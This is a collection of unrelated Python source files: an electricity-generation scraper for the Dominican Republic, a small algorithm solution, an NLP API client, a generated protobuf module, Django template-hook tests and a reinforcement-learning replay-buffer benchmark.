seed = sys.argv[2]
write_ca(n, seed)
else:
write_ca(n)
|
py | 1a4fc7fc9b01df0cf3062035e942f8c7d88b04a1 | #!/usr/bin/env python3
import arrow
from bs4 import BeautifulSoup
from collections import defaultdict
import logging
from math import isnan
import numpy as np
from operator import itemgetter
import pandas as pd
import requests
# This parser gets hourly electricity generation data from oc.org.do for the Dominican Republic.
# The data is in MWh but since it is updated hourly we can view it as MW.
# Solar generation now has some data available but multiple projects are planned/under construction.
url = 'http://190.122.102.21:8084/reportesgraficos/reportepostdespacho.aspx'
total_mapping = {
u'Total T\xe9rmico': 'Thermal',
u'Total E\xf3lico': 'Wind',
u'Total Hidroel\xe9ctrica': 'Hydro',
u'Total Solar': 'Solar',
u'Total Generado': 'Generated'
}
# Power plant types
# http://www.sie.gob.do/images/Estadisticas/MEM/GeneracionDiariaEnero2017/
# Reporte_diario_de_generacion_31_enero_2017_merged2.pdf
thermal_plants = {
u'AES ANDRES': 'gas',
u'BARAHONA CARBON': 'coal',
u'BERSAL': 'oil',
u'CEPP 1': 'oil',
u'CEPP 2': 'oil',
u'CESPM 1': 'oil',
u'CESPM 2': 'oil',
u'CESPM 3': 'oil',
u'ESTRELLA DEL MAR 2 CFO': 'oil',
u'ESTRELLA DEL MAR 2 CGN': 'gas',
u'ESTRELLA DEL MAR 2 SFO': 'oil',
u'ESTRELLA DEL MAR 2 SGN': 'gas',
u'GENERACI\xD3N DE EMERGENCIA AES ANDR\xC9S': 'gas',
u'HAINA TG': 'oil',
u'INCA KM22': 'oil',
u'ITABO 1': 'coal',
u'ITABO 2': 'coal',
u'LA VEGA': 'oil',
u'LOS MINA 5': 'gas',
u'LOS MINA 6': 'gas',
u'LOS MINA 7': 'gas',
u'LOS OR\xcdGENES POWER PLANT FUEL OIL': 'oil',
u'LOS OR\xcdGENES POWER PLANT GAS NATURAL': 'gas',
u'METALDOM': 'oil',
u'MONTE RIO': 'oil',
u'PALAMARA': 'oil',
u'PALENQUE': 'oil',
u'PARQUE ENERGETICO LOS MINA CC PARCIAL': 'gas',
u'PARQUE ENERGETICO LOS MINA CC TOTAL': 'gas',
u'PIMENTEL 1': 'oil',
u'PIMENTEL 2': 'oil',
u'PIMENTEL 3': 'oil',
u'PUNTA CATALINA 1': 'coal',
u'PUNTA CATALINA 2': 'coal',
u'QUISQUEYA 1': 'gas',
u'QUISQUEYA 2': 'gas',
u'QUISQUEYA 1 SAN PEDRO': 'oil',
u'RIO SAN JUAN': 'oil',
u'SAN FELIPE': 'oil',
u'SAN FELIPE CC': 'gas',
u'SAN FELIPE VAP': 'oil',
u'SAN LORENZO 1': 'gas',
u'SAN PEDRO BIO-ENERGY': 'biomass',
u'SAN PEDRO VAPOR': 'oil',
u'SULTANA DEL ESTE': 'oil'
}
def get_data(session=None):
"""
Makes a request to source url.
Finds main table and creates a list of all table elements in string format.
Returns a list.
"""
data = []
s = session or requests.Session()
data_req = s.get(url)
soup = BeautifulSoup(data_req.content, 'lxml')
tbs = soup.find("table", id="PostdespachoUnidadesTermicasGrid_DXMainTable")
rows = tbs.find_all("td")
for row in rows:
num = row.getText().strip()
data.append(str(num))
return data
def floater(item):
"""
Attempts to convert any item given to a float. Returns item if it fails.
"""
try:
return float(item)
except ValueError:
return item
def chunker(big_lst):
"""
Breaks a big list into a list of lists. Removes any list with no data then turns remaining
lists into key: value pairs with first element from the list being the key.
Returns a dictionary.
"""
chunks = [big_lst[x:x + 27] for x in range(0, len(big_lst), 27)]
# Remove any chunk that contains no data (filter instead of mutating the list while iterating over it).
chunks = [chunk for chunk in chunks if any(chunk)]
chunked_list = {words[0]: words[1:] for words in chunks}
return chunked_list
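# Added illustrative note: the source table is read 27 cells at a time, so chunker() turns the
# flat cell list into rows of 27 and keys each row by its first cell, e.g. a row starting with a
# plant name such as 'PALAMARA' becomes {'PALAMARA': [<26 hourly values>]} (the name is only an
# example value here).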
def data_formatter(data):
"""
Takes data and finds relevant sections. Formats and breaks data into usable parts.
Returns a nested dictionary.
"""
find_thermal_index = data.index(u'GRUPO: T\xe9rmica')
find_totals_index = data.index(u'Total T\xe9rmico')
find_totals_end = data.index(u'Total Programado')
ufthermal = data[find_thermal_index + 3:find_totals_index - 59]
total_data = data[find_totals_index:find_totals_end]
# Remove all company names.
for val in ufthermal:
if ':' in val:
i = ufthermal.index(val)
del ufthermal[i:i + 3]
formatted_thermal = chunker([floater(item) for item in ufthermal])
mapped_totals = [total_mapping.get(x, x) for x in total_data]
formatted_totals = chunker([floater(item) for item in mapped_totals])
return {'totals': formatted_totals, 'thermal': formatted_thermal}
def data_parser(formatted_data):
"""
Converts formatted data into a pandas dataframe. Removes any empty rows.
Returns a DataFrame.
"""
hours = list(range(1, 24)) + [0] + [25, 26]
dft = pd.DataFrame(formatted_data, index=hours)
dft = dft.drop(dft.index[[-1, -2]])
dft = dft.replace(u'', np.nan)
dft = dft.dropna(how='all')
return dft
def thermal_production(df, logger):
"""
Takes DataFrame and finds thermal generation for each hour.
Removes any non generating plants then maps plants to type.
Sums type instances and returns a dictionary.
"""
therms = []
unmapped = set()
for hour in df.index.values:
dt = hour
currentt = df.loc[[hour]]
# Create current plant output.
tp = {}
for item in list(df):
v = currentt.iloc[0][item]
tp[item] = v
current_plants = {k: tp[k] for k in tp if not isnan(tp[k])}
for plant in current_plants.keys():
if plant not in thermal_plants.keys():
unmapped.add(plant)
mapped_plants = [(thermal_plants.get(plant, 'unknown'), val) for plant, val in current_plants.items()]
thermalDict = defaultdict(lambda: 0.0)
# Sum values for duplicate keys.
for key, val in mapped_plants:
thermalDict[key] += val
thermalDict['datetime'] = dt
thermalDict = dict(thermalDict)
therms.append(thermalDict)
for plant in unmapped:
logger.warning(
'{} is missing from the DO plant mapping!'.format(plant),
extra={'key': 'DO'})
return therms
def total_production(df):
"""
Takes DataFrame and finds generation totals for each hour.
Returns a dictionary.
"""
vals = []
# The Dominican Republic does not observe daylight savings time.
for hour in df.index.values:
dt = hour
current = df.loc[[hour]]
hydro = current.iloc[0]['Hydro']
wind = current.iloc[0]['Wind']
solar = current.iloc[0]['Solar']
if wind > -10:
wind = max(wind, 0)
# Wind and hydro totals do not always update exactly on the new hour.
# In this case we set them to None because they are unknown rather than zero.
if isnan(wind):
wind = None
if isnan(hydro):
hydro = None
prod = {'wind': wind, 'hydro': hydro, 'solar': solar, 'datetime': dt}
vals.append(prod)
return vals
def merge_production(thermal, total):
"""
Takes thermal generation and total generation and merges them using 'datetime' key.
Returns a defaultdict.
"""
d = defaultdict(dict)
for each in (thermal, total):
for elem in each:
d[elem['datetime']].update(elem)
final = sorted(d.values(), key=itemgetter("datetime"))
def get_datetime(hour):
at = arrow.now('America/Dominica').floor('day')
dt = (at.shift(hours=int(hour) - 1)).datetime
return dt
for item in final:
i = item['datetime']
j = get_datetime(i)
item['datetime'] = j
return final
def fetch_production(zone_key='DO', session=None, target_datetime=None, logger=logging.getLogger(__name__)):
"""
Requests the last known production mix (in MW) of a given country
Arguments:
zone_key (optional) -- used in case a parser is able to fetch multiple countries
Return:
A dictionary in the form:
{
'zoneKey': 'FR',
'datetime': '2017-01-01T00:00:00Z',
'production': {
'biomass': 0.0,
'coal': 0.0,
'gas': 0.0,
'hydro': 0.0,
'nuclear': null,
'oil': 0.0,
'solar': 0.0,
'wind': 0.0,
'geothermal': 0.0,
'unknown': 0.0
},
'storage': {
'hydro': -10.0,
},
'source': 'mysource.com'
}
"""
if target_datetime:
raise NotImplementedError('This parser is not yet able to parse past dates')
dat = data_formatter(get_data(session=None))
tot = data_parser(dat['totals'])
th = data_parser(dat['thermal'])
thermal = thermal_production(th, logger)
total = total_production(tot)
merge = merge_production(thermal, total)
production_mix_by_hour = []
for hour in merge:
production_mix = {
'zoneKey': zone_key,
'datetime': hour['datetime'],
'production': {
'biomass': hour.get('biomass', 0.0),
'coal': hour.get('coal', 0.0),
'gas': hour.get('gas', 0.0),
'hydro': hour.get('hydro', 0.0),
'nuclear': 0.0,
'oil': hour.get('oil', 0.0),
'solar': hour.get('solar', 0.0),
'wind': hour.get('wind', 0.0),
'geothermal': 0.0,
'unknown': hour.get('unknown', 0.0)
},
'storage': {
'hydro': None,
},
'source': 'oc.org.do'
}
production_mix_by_hour.append(production_mix)
return production_mix_by_hour
if __name__ == '__main__':
"""Main method, never used by the Electricity Map backend, but handy for testing."""
print('fetch_production() ->')
print(fetch_production())
|
py | 1a4fc873f27d2165ade68cc9fbe4a9ce00dcfe06 | class Solution(object):
def sumZero(self, n):
"""
:type n: int
:rtype: List[int]
Generate symmetric pairs (+i, -i) so that the whole list adds up to 0
"""
even = (n % 2 == 0)
lo = n // 2
res = []
if not even: res.append(0)
for i in range(1, lo+1):
res.append(-i)
res.append(i)
return res
z = Solution()
n = 5
print(sum(z.sumZero(n)))
|
py | 1a4fc887a87161bb829027e9e8d3cfadf40f9086 | import requests
from bytesviewapi.api_authentication import BytesApiAuth
from bytesviewapi import constants
from bytesviewapi.utils import is_valid_dict
import json
from bytesviewapi.bytesviewapi_exception import BytesviewException
class BytesviewApiClient(object):
def __init__(self, api_key=None, session=None):
""" Initializes a Bytesview client object for accessing the Bytesview APIs """
"""
:param api_key: your API key.
:type api_key: string
:param session: Default value for this argument is None but if you’re making several requests to the same host,
the underlying TCP connection will be reused, which can result in a significant performance increase.
Please make sure to call session.close() after executing all calls to free up resources.
:type session: requests.Session
"""
self.api_key = api_key
# BytesviewAPI request header
self.header = BytesApiAuth(api_key=self.api_key)
# Check if session argument is None
if session is None:
self.request_method = requests
else:
self.request_method = session
def sentiment_api( self, data=None, lang="en"):
""" Sending POST request to the sentiment api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en, Arabic - ar). Default language is English (en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.SENTIMENT_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.SENTIMENT_URL
response = self.request_method.post(constants.SENTIMENT_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
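# Added usage sketch (not part of the original client; the API key below is a placeholder):
#
#   client = BytesviewApiClient(api_key="YOUR_API_KEY")
#   result = client.sentiment_api(data={"0": "this is good"}, lang="en")
#
# The remaining *_api methods below follow the same data/lang calling convention.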
def emotion_api( self, data=None, lang="en"):
""" Sending POST request to the emotion api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en). Default language is English (en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.EMOTION_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.EMOTION_URL
response = self.request_method.post(constants.EMOTION_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def keywords_api( self, data=None, lang="en"):
""" Sending POST request to the keywords api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en). Default language is English (en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.KEYWORDS_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.KEYWORDS_URL
response = self.request_method.post(constants.KEYWORDS_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def semantic_api( self, data=None, lang="en"):
""" Sending POST request to the semantic api"""
"""
:param data: Pass both of your strings under the "string1" and "string2" keys of the data dictionary. (ex. {"string1": "this is good", "string2": "this is great"})
:type data: dictionary
:param lang: Language Code (English - en). Default language is English (en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.SEMANTIC_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.SEMANTIC_URL
response = self.request_method.post(constants.SEMANTIC_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def name_gender_api( self, data=None):
""" Sending POST request to the name-gender api"""
"""
:param data: Pass your desired names in the dictionary format where each string has some unique key. (ex. {0: "ron"})
:type data: dictionary
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Make a POST request to constants.NAME_GENDER_URL
response = self.request_method.post(constants.NAME_GENDER_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def ner_api( self, data=None, lang="en"):
""" Sending POST request to the ner api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en). Default language is English (en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.NER_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.NER_URL
response = self.request_method.post(constants.NER_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def intent_api( self, data=None, lang="en"):
""" Sending POST request to the intent api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en). Default language is English (en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.INTENT_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.INTENT_URL
response = self.request_method.post(constants.INTENT_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json() |
py | 1a4fc88cb599f0d6d3cb707e248be5ea145e7227 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/argmax_matcher.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/argmax_matcher.proto',
package='object_detection.protos',
serialized_pb=_b('\n,object_detection/protos/argmax_matcher.proto\x12\x17object_detection.protos\"\xec\x01\n\rArgMaxMatcher\x12\x1e\n\x11matched_threshold\x18\x01 \x01(\x02:\x03\x30.5\x12 \n\x13unmatched_threshold\x18\x02 \x01(\x02:\x03\x30.5\x12 \n\x11ignore_thresholds\x18\x03 \x01(\x08:\x05\x66\x61lse\x12,\n\x1enegatives_lower_than_unmatched\x18\x04 \x01(\x08:\x04true\x12\'\n\x18\x66orce_match_for_each_row\x18\x05 \x01(\x08:\x05\x66\x61lse\x12 \n\x11use_matmul_gather\x18\x06 \x01(\x08:\x05\x66\x61lse')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ARGMAXMATCHER = _descriptor.Descriptor(
name='ArgMaxMatcher',
full_name='object_detection.protos.ArgMaxMatcher',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='matched_threshold', full_name='object_detection.protos.ArgMaxMatcher.matched_threshold', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=0.5,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='unmatched_threshold', full_name='object_detection.protos.ArgMaxMatcher.unmatched_threshold', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=0.5,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ignore_thresholds', full_name='object_detection.protos.ArgMaxMatcher.ignore_thresholds', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='negatives_lower_than_unmatched', full_name='object_detection.protos.ArgMaxMatcher.negatives_lower_than_unmatched', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='force_match_for_each_row', full_name='object_detection.protos.ArgMaxMatcher.force_match_for_each_row', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_matmul_gather', full_name='object_detection.protos.ArgMaxMatcher.use_matmul_gather', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=310,
)
DESCRIPTOR.message_types_by_name['ArgMaxMatcher'] = _ARGMAXMATCHER
ArgMaxMatcher = _reflection.GeneratedProtocolMessageType('ArgMaxMatcher', (_message.Message,), dict(
DESCRIPTOR = _ARGMAXMATCHER,
__module__ = 'object_detection.protos.argmax_matcher_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.ArgMaxMatcher)
))
_sym_db.RegisterMessage(ArgMaxMatcher)
# @@protoc_insertion_point(module_scope)
|
py | 1a4fc8d5119d18d959a75277efe1b5b3ced870cd | from typing import List
from model import EmployeeModel
class EmployeeController:
"""
Employee information controller
"""
__start_id = 1001
@classmethod
def __set_employee_id(cls, emp):
emp.eid = cls.__start_id
cls.__start_id += 1
def __init__(self):
self.__all_employee = [] # type:List[EmployeeModel]
self.__start_eid = 1001
@property
def all_employee(self):
return self.__all_employee
def add_employee(self, emp: EmployeeModel):
"""
Add an employee record
:param emp: the employee information to add
"""
EmployeeController.__set_employee_id(emp)
self.__all_employee.append(emp)
def remove_employee(self, eid: int) -> bool:
"""
Remove an employee record by employee id
:param eid: employee id
:return: whether the removal succeeded
"""
for i in range(len(self.__all_employee)):
if self.__all_employee[i].eid == eid:
del self.__all_employee[i]
return True
return False
def update_employee(self, commodity: EmployeeModel) -> bool:
"""
Update an employee record
:param commodity: the updated employee information
:return: whether the update succeeded
"""
for item in self.__all_employee:
if item.eid == commodity.eid:
item.__dict__ = commodity.__dict__
return True
return False
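# Added usage sketch (illustrative; the EmployeeModel constructor arguments are assumed, not known):
#
#   ctrl = EmployeeController()
#   ctrl.add_employee(EmployeeModel(...))   # an eid is assigned automatically, starting at 1001
#   ctrl.remove_employee(1001)              # True if an employee with eid 1001 existed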
|
py | 1a4fc90071eafdfe5dffa796f2d567d5afc82e3b | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from django.template import Template, Context
from django.utils.html import mark_safe
from hooks.templatehook import hook
from hooks.templatetags.hooks_tags import template_hook_collect
from . import utils_hooks
class HookTagTest(TestCase):
def setUp(self):
self.hook_name = 'myhook'
hook.unregister_all(self.hook_name)
utils_hooks.myhook.unregister_all()
def test_hook_tag(self):
def func(context, *args, **kwargs):
self.assertEqual(args, ("foobar", ))
self.assertEqual(kwargs, {'bar': "bar", })
self.assertEqual(context['foo'], "foo")
return "hello"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' bar='bar' %}"
).render(Context({"hook_name": self.hook_name, "foo": "foo", }))
self.assertEqual(out, u"hello")
def test_hook_tag_many(self):
"""
Should join multiple responses
"""
def func_a(*args, **kwargs):
return "hello"
def func_b(*args, **kwargs):
return "goodbye"
hook.register(self.hook_name, func_a)
hook.register(self.hook_name, func_b)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "hello\ngoodbye")
def test_hook_tag_escaped(self):
"""
Should escape responses (if they are not marked as safe)
"""
def func(*args, **kwargs):
return "<span>hello</span>"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "&lt;span&gt;hello&lt;/span&gt;")
def test_hook_tag_mark_safe(self):
"""
Should not escape safe strings
"""
def func(*args, **kwargs):
return mark_safe("<span>hello</span>")
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "<span>hello</span>")
def test_template_hook_collect(self):
def func(context, *args, **kwargs):
self.assertEqual(context, "context")
self.assertEqual(args, ("foo", ))
self.assertEqual(kwargs, {'extra': "bar", })
return "hello"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, u"hello")
res = template_hook_collect(utils_hooks, 'badhook')
self.assertEqual(res, u"")
def test_template_hook_collect_escaped(self):
def func(*args, **kwargs):
return "<span>hello</span>"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, "&lt;span&gt;hello&lt;/span&gt;")
|
py | 1a4fc9af96a4d2b3224f423bcdf9b1ced219940c | import os
import sys
from time import time as timer
import gym
import torch
import numpy as np
import numpy.random as rd
'''
2020-0505 ZenJiaHao Github: YonV1943
Compare the running speed of different ReplayBuffer(Memory) implement.
ReplayBuffer UsedTime(s) Storage(memories)
MemoryList: 24 list()
MemoryTuple: 20 collections.namedtuple
MemoryArray: 13 numpy.array
MemoryTensor: 13 torch.tensor (GPU/CPU)
'''
class BufferList:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = len(self.memories)
def add_memo(self, memory_tuple):
self.memories.append(memory_tuple)
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert list into array'''
arrays = [list()
for _ in range(5)] # len(self.memories[0]) == 5
for index in indices:
items = self.memories[index]
for item, array in zip(items, arrays):
array.append(item)
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferTuple:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = None # init in init_after_add_memo()
from collections import namedtuple
self.transition = namedtuple(
'Transition', ('reward', 'mask', 'state', 'action', 'next_state',)
)
def add_memo(self, args):
self.memories.append(self.transition(*args))
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert tuple into array'''
arrays = self.transition(*zip(*[self.memories[i] for i in indices]))
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferArray: # 2020-05-20
def __init__(self, memo_max_len, state_dim, action_dim, ):
memo_dim = 1 + 1 + state_dim + action_dim + state_dim
self.memories = np.empty((memo_max_len, memo_dim), dtype=np.float32)
self.next_idx = 0
self.is_full = False
self.max_len = memo_max_len
self.now_len = self.max_len if self.is_full else self.next_idx
self.state_idx = 1 + 1 + state_dim # reward_dim==1, done_dim==1
self.action_idx = self.state_idx + action_dim
def add_memo(self, memo_tuple):
self.memories[self.next_idx] = np.hstack(memo_tuple)
self.next_idx = self.next_idx + 1
if self.next_idx >= self.max_len:
self.is_full = True
self.next_idx = 0
def init_after_add_memo(self):
self.now_len = self.max_len if self.is_full else self.next_idx
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
memory = self.memories[indices]
memory = torch.tensor(memory, device=device)
'''convert array into torch.tensor'''
tensors = (
memory[:, 0:1], # rewards
memory[:, 1:2], # masks, mark == (1-float(done)) * gamma
memory[:, 2:self.state_idx], # states
memory[:, self.state_idx:self.action_idx], # actions
memory[:, self.action_idx:], # next_states
)
return tensors
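# Added layout note (illustrative): each row of self.memories is the flat vector
# [reward, mask, state..., action..., next_state...]. For example, with state_dim=3 and
# action_dim=1 this gives memo_dim=9, state_idx=5 and action_idx=6, so columns 2:5 hold the
# state, 5:6 the action and 6:9 the next state, exactly the slices taken above.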
def uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim):
state = env.reset()
rewards = list()
reward_sum = 0.0
steps = list()
step = 0
global_step = 0
while global_step < max_step:
# action = np.tanh(rd.normal(0, 0.5, size=action_dim)) # zero-mean gauss exploration
action = rd.uniform(-1.0, +1.0, size=action_dim) # uniform exploration
next_state, reward, done, _ = env.step(action * max_action)
reward_sum += reward
step += 1
adjust_reward = reward * reward_scale
mask = 0.0 if done else gamma
memo.add_memo((adjust_reward, mask, state, action, next_state))
state = next_state
if done:
rewards.append(reward_sum)
steps.append(step)
global_step += step
state = env.reset() # reset the environment
reward_sum = 0.0
step = 1
memo.init_after_add_memo()
return rewards, steps
def run_compare_speed_of_replay_buffer():
from AgentRun import get_env_info
os.environ['CUDA_VISIBLE_DEVICES'] = '3' # sys.argv[-1][-4]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = 2 ** 8
max_step = 2 ** 10
gamma = 0.99
reward_scale = 1
memo_max_len = 2 ** 13
start_time = timer()
for env_name in ("LunarLanderContinuous-v2", "BipedalWalker-v3"):
env = gym.make(env_name)
state_dim, action_dim, max_action, target_reward = get_env_info(env)
# memo = BufferList(memo_max_len)
# memo = BufferTuple(memo_max_len)
memo = BufferArray(memo_max_len, state_dim, action_dim)
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for i in range(8):
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for _ in range(max_step):
batches = memo.random_sample(batch_size, device)
for batch in batches:
assert torch.is_tensor(batch)
print("Used Time: {:.1f}".format(timer() - start_time))
if __name__ == '__main__':
run_compare_speed_of_replay_buffer()
|
